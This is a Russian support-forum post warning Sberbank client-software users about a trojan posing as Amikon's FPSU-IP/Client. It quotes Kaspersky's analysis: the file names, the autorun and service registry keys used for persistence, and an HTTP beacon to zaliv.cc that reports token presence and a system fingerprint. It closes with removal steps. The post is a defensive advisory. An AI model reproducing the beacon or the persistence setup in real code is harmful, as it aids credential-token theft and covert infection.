On-line: гостей 1. Всего: 1 [подробнее..]
Доска объявлений

08.07.2013 Доступно для скачивания ПО ФПСУ-IP/Клиент Скачать с сайта Сбербанка
08.07.2013 Доступна для скачивания версия 07.020.00 АРМ "Клиент" АС "Клиент-Сбербанк" Скачать с сайта Сбербанка
08.07.2013 Архив ссылок на предыдущие версии АРМ "Клиент" АС "Клиент-Сбербанк" перенесен в тему Загрузка полезной информации


Для Вас доступны следующие темы:
Загрузка полезной информации (*update 09.07.2013)
FAQ по АРМ Клиент

Вы можете оставить свои предложения и отзывы в теме:
Книга отзывов и предложений по работе СБ РФ


АвторСообщение
администратор




Сообщение: 591
Откуда: Россия, Петрозаводск
ссылка на сообщение  Отправлено: 14.05.11 09:06. Заголовок: ВНИМАНИЕ !!! Появилась вирусная троянская программа, имитирующая работу ПО "ФПСУ-IP/Клиент".


При заражении компьютера появляется окно следующего вида :



В случае появления такого сообщения, ООО "Амикон" настоятельно рекомендует провести лечение компьютера антивирусным ПО с актуальными антивирусными базами.

Более подробно:

Официальный ответ Лаборатории Касперского на наш запрос по поводу данной вредоносной программы был следующий:

Trojan.Win32.Agent.mzne
Троянская программа, выполняющая деструктивные действия на компьютере пользователя. Программа является приложением Windows (PE EXE-файл). Имеет размер 678912 байт. Упакована при помощи UPX. Распакованный размер - около 10 МБ. Написана на Delphi.

Инсталляция
Троянец копирует свое тело в системный каталог Windows под именем "amicon.exe":
%System%\amicon.exe
Для автоматического запуска при следующем старте системы троянец добавляет запись в ключ автозапуска системного реестра:
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"Amicon Update Service" = "%System%\amicon.exe /s"
Также троянец создает службу с именем "Amicon Update Service", за которую отвечает следующий ключ системного реестра:
[HKLM\System\CurrentControlSet\Services\Amicon Update Service]

Деструктивная активность
Троянец выполняет периодическую проверку наличия на зараженном компьютере токена компании "АМИКОН" и отправляет запрос следующего вида:
GET /amikon/knock.php?id=[SysInfo]&i=[key] HTTP/1.1
Host: zaliv.cc
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)

Где key - значение, указывающее на наличие токена, SysInfo - последовательность из цифр и букв латинского алфавита полученная на основе значений параметров из следующих ключей системного реестра:
[HKLM\Software\Microsoft\Windows NT\CurrentVersion]
"DigitalProductId"

[HKLM\Hardware\Description\System]
"SystemBiosVersion"
"VideoBiosVersion"

На момент создания описания URL адрес не работал.

Во время своей работы троянец отображает окна следующего вида:






Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:
1. При помощи ("Диспетчера задач") завершить троянский процесс: amicon.exe
2. Удалить оригинальный файл троянца (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
3. Удалить файлы:
%System%\amicon.exe
4. Удалить ключи системного реестра (как работать с реестром?):
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"Amicon Update Service" = "%System%\amicon.exe /s"
[HKLM\System\CurrentControlSet\Services\Amicon Update Service]
5. Произвести полную проверку компьютера антивирусным ПО с обновленными антивирусными базами (к примеру, Антивирус Касперского: скачать пробную версию).

* Сами действия, создаваемые указанным кодом, не несут в себе деструктивную функцию, что собственно характерно для троянских программ.



Оцениваем наш форум и говорим "Спасибо!" в СМС-копилке... ждем Ваших СМС... Спасибо: 1 
Профиль
Новых ответов нет


Тему читают:
- участник сейчас на форуме
- участник вне форума
Все даты в формате GMT  3 час. Хитов сегодня: 7
Права: смайлы да, картинки да, шрифты нет, голосования нет
аватары да, автозамена ссылок вкл, премодерация откл, правка нет



Создай свой форум на сервисе Borda.ru
Текстовая версия

клиент сбербанк банк клиент сбербанк АРМ Клиент Клиент-Сбербанк Сбербанк АС Клиент-Сбербанк Форум СПЭД Sbersign фактура Сбербанк Он-лайн ошибка RAS ошибка Winsocket